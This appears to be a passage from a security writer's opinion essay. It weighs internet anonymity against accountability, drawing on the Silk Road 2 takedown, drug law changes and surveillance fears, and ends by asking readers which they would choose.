I am somewhat surprised to find that, when given only the choice between one or the other, it has been nearly an even split amongst the people I talk to – usually at conferences – as to which they’d prefer. Right now, we teeter on the brink of having no anonymity at all. With enough vulnerabilities that allow full compromises of millions of machines, and enough listening posts all over the world, anonymity is slowly but surely getting harder and harder to come by. Look at the most recent busts of various Tor hidden services like Silk Road 2 – people whose livelihoods and freedom depend on privacy still can’t manage it.

Most people would say that drug dealers and arms dealers deserve to be behind bars, so good riddance, regardless of how it happened. However, what about Colorado? Last year, being in possession of marijuana would land you in jail. This year it won’t. So are we as a society willing to indiscriminately put people in jail for breaking the law, even when the law later turns out to be unjust and/or bad for society?

Or worse yet, what if our government moves into a second age of McCarthyism – where they hunt down those who engage in civil disobedience with untold masses of siphoned information to decide whom to jail and whom to leave alone? What if adultery suddenly became a felony? Thought crimes could be punishable in such a dystopian world — not a pretty sight either. Though your banking passwords would be safe, certainly. (Except from the government.)

Perhaps releasing certain types of criminals or forgiving certain types of crimes, as California is about to do, might be a worthwhile exercise. A certain level of crime, while seemingly bad, is critical to allowing for a free society. It’s a complex issue, and of course there is always a middle-ground, but I think to properly understand the middle ground you have to explore the edges. What would a perfectly accountable Internet bring? It would bring with it a near zero cyber-crime rate but also limited freedoms. What would a perfectly anonymous Internet bring? It would bring unfettered cyber-crime but unlimited freedoms. It feels like you’d want some sort of middle ground, but there’s no such thing as “somewhat anonymous” when your life depends on it.

While my younger self would have said that “attribution” was the key to security, I would now tell my younger self to look beyond security, and really contemplate what a completely secure society would look like. Maybe a completely secure society with attribution for every act isn’t such a great idea after all, I would warn him. There are probably no easy answers, but it’s a conversation that needs to happen.

Assuming for a second that there was only one answer, if you had to choose one, which would it be: anonymity or accountability? And more importantly, why?